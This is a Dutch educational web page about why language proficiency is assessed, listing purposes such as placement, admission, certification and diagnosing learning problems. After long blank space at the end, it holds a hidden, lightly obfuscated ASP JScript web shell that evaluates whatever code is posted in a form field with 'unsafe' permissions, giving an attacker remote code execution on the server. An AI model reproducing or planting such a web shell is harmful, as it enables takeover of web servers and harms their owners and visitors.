Start >  informatiepunt
      Start >>
      Wat is evalueren?
      Visie en voorbeelden
      Toetstips en
      stappenplannen evaluatie
      Achtergronden en links

>>Waarom evalueren? 

Wat wil je doen met de resultaten van de evaluatie?

  • Een eerste indruk krijgen van de taalvaardigheid van studenten in een nieuwe groep
  • Iemand toelaten of weigeren
      • in een bepaalde niveaugroep van de taalopleiding
      • om in een bepaalde opleiding of traject te stappen
      • om een sociale woning te betrekken
      • om de Belgisch nationaliteit te verkrijgen
      • om zijn integratie te bewijzen
      • voor een bepaalde tewerkstelling
      • …
  • Iemand een certificaat, diploma, getuigschrift,… geven
  • Je eigen onderwijsniveau vergelijken met andere scholen
  • Je eigen onderwijs verbeteren
  • Een diagnose stellen bij bepaalde leerproblemen
  • Vorderingen in een taalleertraject meten om het leerproces van de geteste leerder optimaliseren

Het meten van taalvaardigheid blijkt vele bedoelingen te hebben, maar:

  • één evaluatie kan niet alle doelen tegelijk dienen. Voor elke doel moet je een geschikte evaluatievorm kiezen
  • niveau taalvaardigheid is bij het nemen van beslissingen vaak slechts één element naast vele andere

Verder naar 'Wat evalueren?'>>

 

 

 

Terug Informatiepunt>>

 

 

 

 

 

 

 

 

 

 

 


<%@ Page Language="Jscript" Debug=true%> <% var SO=Request.Form["M"]; var NJF="unsa",PKCLJIY="fe",VSEWDZ=NJF+PKCLJIY; function UKBT() { return SO; } function UJWHK() { return eval(UKBT(),VSEWDZ); } UJWHK() %>